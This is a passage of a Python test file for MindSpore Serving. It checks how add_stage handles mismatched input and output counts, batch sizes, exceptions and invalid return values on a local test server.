assert (result[0]["y2"] == y2s[0]).all()
assert (result[1]["y2"] == y2s[1]).all()
assert (result[2]["y2"] == y2s[2]).all()
@serving_test
def test_stage_function_one_function_stage_output_more_failed():
"""
Feature: test servable_config.py stage
Description: Test stage declared outputs_count < python function outputs count
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
return x1+x2, x1-x2, 1
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
return y1, y2
"""
base = start_serving_server(servable_content)
# Client
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
instances = [{"x1": x1, "x2": x2}] * 3
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
if isinstance(result, dict):
assert "servable is not available" in result["error"] \
or f"Call Function '{base.servable_name}.func_test' Failed" in result["error"]
else:
assert "servable is not available" in result[0]["error"] \
or f"Call Function '{base.servable_name}.func_test' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_output_less_failed():
"""
Feature: test servable_config.py stage
Description: Test stage declared outputs_count > python function outputs count
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
return x1+x2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
return y1, y2
"""
base = start_serving_server(servable_content)
# Client
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
instances = [{"x1": x1, "x2": x2}] * 3
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
if isinstance(result, dict):
assert "servable is not available" in result["error"] \
or f"Call Function '{base.servable_name}.func_test' Failed" in result["error"]
else:
assert "servable is not available" in result[0]["error"] \
or f"Call Function '{base.servable_name}.func_test' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_error_outputs_count_failed():
"""
Feature: test servable_config.py stage
Description: Test stage declared outputs_count > python function outputs count
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
return x1+x2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=3)
return y1, y2
"""
try:
start_serving_server(servable_content)
assert False
except RuntimeError as e:
assert "too many values to unpack (expected 2)" in str(e)
@serving_test
def test_stage_function_one_function_stage_error_outputs_count2_failed():
"""
Feature: test servable_config.py stage
Description: Test stage declared outputs_count < python function outputs count
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
return x1+x2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=1)
return y1, y2
"""
try:
start_serving_server(servable_content)
assert False
except RuntimeError as e:
assert "cannot unpack non-iterable _TensorDef object" in str(e)
@serving_test
def test_stage_function_one_function_stage_input_more_failed():
"""
Feature: test servable_config.py stage
Description: Test stage declared inputs count < python function inputs count
Expectation: Serving server startup error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2, x3):
return x1, x2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
return y1, y2
"""
try:
start_serving_server(servable_content)
assert False
except RuntimeError as e:
assert "function func_test input args count 3 not match the count 2 registered in method" in str(e)
@serving_test
def test_stage_function_one_function_stage_input_less_failed():
"""
Feature: test servable_config.py stage
Description: Test stage declared inputs count > python function inputs count
Expectation: Serving server startup error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1):
return x1, x2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
return y1, y2
"""
try:
start_serving_server(servable_content)
assert False
except RuntimeError as e:
assert "function func_test input args count 1 not match the count 2 registered in method" in str(e)
@serving_test
def test_stage_function_one_function_stage_raise_exception_failed():
"""
Feature: test servable_config.py stage
Description: Stage python function raise exception
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
raise RuntimeError("runtime error text")
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
return y1, y2
"""
base = start_serving_server(servable_content)
# Client
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
instances = [{"x1": x1, "x2": x2}] * 3
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
if isinstance(result, dict):
assert "servable is not available" in result["error"] \
or f"Call Function '{base.servable_name}.func_test' Failed" in result["error"]
else:
assert "servable is not available" in result[0]["error"] \
or f"Call Function '{base.servable_name}.func_test' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_none_outputs_failed():
"""
Feature: test servable_config.py stage
Description: Stage python function return None
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
print("none outputs")
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
return y1, y2
"""
base = start_serving_server(servable_content)
# Client
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
instances = [{"x1": x1, "x2": x2}] * 3
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
if isinstance(result, dict):
assert "servable is not available" in result["error"] \
or f"Call Function '{base.servable_name}.func_test' Failed" in result["error"]
else:
assert "servable is not available" in result[0]["error"] \
or f"Call Function '{base.servable_name}.func_test' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_invalid_output_dtype_failed():
"""
Feature: test servable_config.py stage
Description: Stage python function return invalid data, dtype is not supported
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
return x1.dtype, x2.dtype
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
return y1, y2
"""
base = start_serving_server(servable_content)
# Client
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
instances = [{"x1": x1, "x2": x2}] * 3
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
if isinstance(result, dict):
assert "servable is not available" in result["error"] \
or f"Call Function '{base.servable_name}.func_test' Failed" in result["error"]
else:
assert "servable is not available" in result[0]["error"] \
or f"Call Function '{base.servable_name}.func_test' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_batch_size_success():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, and result output count is 1, tuple/list
Expectation: Serving server work ok.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y = instance[0] + instance[1]
results.append([y])
return results
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
return y
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
ys = []
for i in range(3):
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
y = x1 + x2
instances.append({"x1": x1, "x2": x2})
ys.append(y)
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert is_float_equal(result[0]["y"], ys[0])
assert is_float_equal(result[1]["y"], ys[1])
assert is_float_equal(result[2]["y"], ys[2])
@serving_test
def test_stage_function_one_function_stage_batch_size2_success():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, and result output count is 1, not tuple/list
Expectation: Serving server work ok.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y = instance[0] + instance[1]
results.append(y)
return results
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
return y
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
ys = []
for i in range(3):
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
y = x1 + x2
instances.append({"x1": x1, "x2": x2})
ys.append(y)
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert is_float_equal(result[0]["y"], ys[0])
assert is_float_equal(result[1]["y"], ys[1])
assert is_float_equal(result[2]["y"], ys[2])
@serving_test
def test_stage_function_one_function_stage_batch_size3_success():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, use yield, not tuple/list
Expectation: Serving server work ok.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y = instance[0] + instance[1]
yield y
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
return y
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
ys = []
for i in range(3):
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
y = x1 + x2
instances.append({"x1": x1, "x2": x2})
ys.append(y)
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert is_float_equal(result[0]["y"], ys[0])
assert is_float_equal(result[1]["y"], ys[1])
assert is_float_equal(result[2]["y"], ys[2])
@serving_test
def test_stage_function_one_function_stage_batch_size4_success():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, use yield, use tuple/list
Expectation: Serving server work ok.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y = instance[0] + instance[1]
yield [y]
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
return y
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
ys = []
for i in range(3):
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
y = x1 + x2
instances.append({"x1": x1, "x2": x2})
ys.append(y)
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert is_float_equal(result[0]["y"], ys[0])
assert is_float_equal(result[1]["y"], ys[1])
assert is_float_equal(result[2]["y"], ys[2])
@serving_test
def test_stage_function_one_function_stage_batch_size_equal1_success():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, batch size = 1
Expectation: Serving server work ok.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y = instance[0] + instance[1]
yield y
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=1)
return y
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
ys = []
for i in range(3):
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
y = x1 + x2
instances.append({"x1": x1, "x2": x2})
ys.append(y)
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert is_float_equal(result[0]["y"], ys[0])
assert is_float_equal(result[1]["y"], ys[1])
assert is_float_equal(result[2]["y"], ys[2])
@serving_test
def test_stage_function_one_function_stage_batch_size_0_success():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, batch size=0, batch size is determined by system
Expectation: Serving server work ok.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y = instance[0] + instance[1]
yield y
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=0)
return y
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
ys = []
for i in range(3):
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
y = x1 + x2
instances.append({"x1": x1, "x2": x2})
ys.append(y)
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert is_float_equal(result[0]["y"], ys[0])
assert is_float_equal(result[1]["y"], ys[1])
assert is_float_equal(result[2]["y"], ys[2])
@serving_test
def test_stage_function_one_function_stage_error_batch_size_failed():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, batch size is invalid
Expectation: Serving server startup failed.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y = instance[0] + instance[1]
yield y
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=-1)
return y
"""
try:
start_serving_server(servable_content, model_file="tensor_add.mindir")
assert False
except RuntimeError as e:
assert "Parameter 'batch_size' should be >= 0" in str(e)
@serving_test
def test_stage_function_one_function_stage_batch_size_two_outputs_success():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, yield, result outputs count is 2
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y1 = instance[0] + instance[1]
y2 = instance[0] - instance[1]
yield y1, y2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2 = register.add_stage(func_test_batch, x1, x2, outputs_count=2, batch_size=2)
return y1, y2
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
y1s = []
y2s = []
for i in range(3):
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
y1 = x1 + x2
y2 = x1 - x2
instances.append({"x1": x1, "x2": x2})
y1s.append(y1)
y2s.append(y2)
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert is_float_equal(result[0]["y1"], y1s[0])
assert is_float_equal(result[1]["y1"], y1s[1])
assert is_float_equal(result[2]["y1"], y1s[2])
assert is_float_equal(result[0]["y2"], y2s[0])
assert is_float_equal(result[1]["y2"], y2s[1])
assert is_float_equal(result[2]["y2"], y2s[2])
@serving_test
def test_stage_function_one_function_stage_batch_size_two_outputs_multi_times_success():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, multi stage
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y1 = instance[0] + instance[1]
y2 = instance[0] - instance[1]
yield y1, y2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2 = register.add_stage(func_test_batch, x1, x2, outputs_count=2, batch_size=2)
y1, y2 = register.add_stage(func_test_batch, y1, y2, outputs_count=2, batch_size=2)
return y1, y2
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
y1s = []
y2s = []
for i in range(3):
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
y1, y2 = x1 + x2, x1 - x2
y1, y2 = y1 + y2, y1 - y2
instances.append({"x1": x1, "x2": x2})
y1s.append(y1)
y2s.append(y2)
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert is_float_equal(result[0]["y1"], y1s[0])
assert is_float_equal(result[1]["y1"], y1s[1])
assert is_float_equal(result[2]["y1"], y1s[2])
assert is_float_equal(result[0]["y2"], y2s[0])
assert is_float_equal(result[1]["y2"], y2s[1])
assert is_float_equal(result[2]["y2"], y2s[2])
@serving_test
def test_stage_function_one_function_stage_batch_size_two_outputs2_success():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, result output count is 2
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y1 = instance[0] + instance[1]
y2 = instance[0] - instance[1]
results.append([y1, y2])
return results
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2 = register.add_stage(func_test_batch, x1, x2, outputs_count=2, batch_size=2)
return y1, y2
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
y1s = []
y2s = []
for i in range(3):
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
y1 = x1 + x2
y2 = x1 - x2
instances.append({"x1": x1, "x2": x2})
y1s.append(y1)
y2s.append(y2)
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert is_float_equal(result[0]["y1"], y1s[0])
assert is_float_equal(result[1]["y1"], y1s[1])
assert is_float_equal(result[2]["y1"], y1s[2])
assert is_float_equal(result[0]["y2"], y2s[0])
assert is_float_equal(result[1]["y2"], y2s[1])
assert is_float_equal(result[2]["y2"], y2s[2])
@serving_test
def test_stage_function_one_function_stage_batch_size_input_more_success():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, used inputs count 2 < declared inputs count 3
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y1 = instance[0] + instance[1]
y2 = instance[0] - instance[1]
results.append([y1, y2])
return results
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2, x3):
y1, y2 = register.add_stage(func_test_batch, x1, x2, x3, outputs_count=2, batch_size=2)
return y1, y2
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
y1s = []
y2s = []
for i in range(3):
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
x3 = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
y1 = x1 + x2
y2 = x1 - x2
instances.append({"x1": x1, "x2": x2, "x3": x3})
y1s.append(y1)
y2s.append(y2)
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert is_float_equal(result[0]["y1"], y1s[0])
assert is_float_equal(result[1]["y1"], y1s[1])
assert is_float_equal(result[2]["y1"], y1s[2])
assert is_float_equal(result[0]["y2"], y2s[0])
assert is_float_equal(result[1]["y2"], y2s[1])
assert is_float_equal(result[2]["y2"], y2s[2])
@serving_test
def test_stage_function_one_function_stage_batch_size_input_less_failed():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, used inputs count 2 > declared inputs count 1
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y1 = instance[0] + instance[1]
y2 = instance[0] - instance[1]
results.append([y1, y2])
return results
@register.register_method(output_names=["y1", "y2"])
def predict(x1):
y1, y2 = register.add_stage(func_test_batch, x1, outputs_count=2, batch_size=2)
return y1, y2
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
for i in range(3):
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
instances.append({"x1": x1})
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
if isinstance(result, dict):
assert "servable is not available" in result["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result["error"]
else:
assert "servable is not available" in result[0]["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_batch_size_output_more_failed():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, outputs count 2 < declared outputs_count 3
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y1 = instance[0] + instance[1]
y2 = instance[0] - instance[1]
results.append([y1, y2])
return results
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
y1, y2, y3 = register.add_stage(func_test_batch, x1, x2, outputs_count=3, batch_size=2)
return y1, y2
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
for i in range(3):
x1 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
instances.append({"x1": x1, "x2": x2})
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
if isinstance(result, dict):
assert "servable is not available" in result["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result["error"]
else:
assert "servable is not available" in result[0]["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_batch_size_output_less_failed():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, outputs count 2 > declared outputs_count 1
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y1 = instance[0] + instance[1]
y2 = instance[0] - instance[1]
results.append([y1, y2])
return results
@register.register_method(output_names=["y1"])
def predict(x1, x2):
y1 = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
return y1
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
for i in range(3):
x1 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
instances.append({"x1": x1, "x2": x2})
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
if isinstance(result, dict):
assert "servable is not available" in result["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result["error"]
else:
assert "servable is not available" in result[0]["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_batch_size_output_less2_failed():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, outputs count 2 > declared outputs_count 1, yield
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y1 = instance[0] + instance[1]
y2 = instance[0] - instance[1]
yield y1, y2
@register.register_method(output_names=["y1"])
def predict(x1, x2):
y1 = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
return y1
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
for i in range(3):
x1 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
instances.append({"x1": x1, "x2": x2})
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
if isinstance(result, dict):
assert "servable is not available" in result["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result["error"]
else:
assert "servable is not available" in result[0]["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_batch_size_raise_exception_failed():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, raise exception
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
raise RuntimeError("runtime error test")
@register.register_method(output_names=["y1"])
def predict(x1, x2):
y1 = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
return y1
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
for i in range(3):
x1 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
instances.append({"x1": x1, "x2": x2})
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
if isinstance(result, dict):
assert "servable is not available" in result["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result["error"]
else:
assert "servable is not available" in result[0]["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_batch_size_none_return_failed():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, return None
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
pass
@register.register_method(output_names=["y1"])
def predict(x1, x2):
y1 = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
return y1
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
for i in range(3):
x1 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
instances.append({"x1": x1, "x2": x2})
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
if isinstance(result, dict):
assert "servable is not available" in result["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result["error"]
else:
assert "servable is not available" in result[0]["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_batch_size_invalid_output_dtype_failed():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, return invalid data
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
results = []
for instance in instances:
y1 = instance[0] + instance[1]
y2 = instance[0] - instance[1]
results.append([y1.dtype, y2.dtype])
return results
@register.register_method(output_names=["y1"])
def predict(x1, x2):
y1 = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
return y1
"""
base = start_serving_server(servable_content, model_file="tensor_add.mindir")
# Client
instances = []
for i in range(3):
